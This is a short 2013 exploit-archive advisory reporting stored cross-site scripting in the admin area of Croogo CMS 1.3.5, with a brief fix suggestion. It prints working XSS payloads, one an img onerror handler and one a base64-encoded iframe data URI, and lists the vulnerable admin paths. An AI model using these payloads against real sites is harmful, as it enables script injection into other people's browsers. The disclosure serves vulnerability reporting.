Home / exploits Croogo 1.3.5 Cross Site Scripting
Posted on 06 June 2013
Exploit Title: Croogo Cms Multiple Cross Site Scripting Vulnerabilities # Date: 06/04/2013 # Author: Nikhalesh Singh Bhadoria # Twitter: @nikhaleshsingh # Download Link: http://www.croogo.org/ # Versions Affected: Croogo 1.3.5 # Category:Xss ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ Description: The Vulnerabilities in admin area contacts options and many other place input in is not sanitized. Therefore it results in a stored cross-site scripting. POC: http://www.youtube.com/watch?v=gyt4-0ekalc&feature=youtu.be Code :- ######################################################################################################## "><img src=x onerror=prompt(0);> <iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> http://demo.xxx.com/admin/nodes/add/blog http://demo.xxx.com/admin/vocabularies http://demo.xxx.com/admin/contacts ########################################################################################################## Fix: Better sanitization by restricting special characters. Regard's Nikhalesh Singh Bhadoria Information Security Enthusiast Website:Gurunsb.com
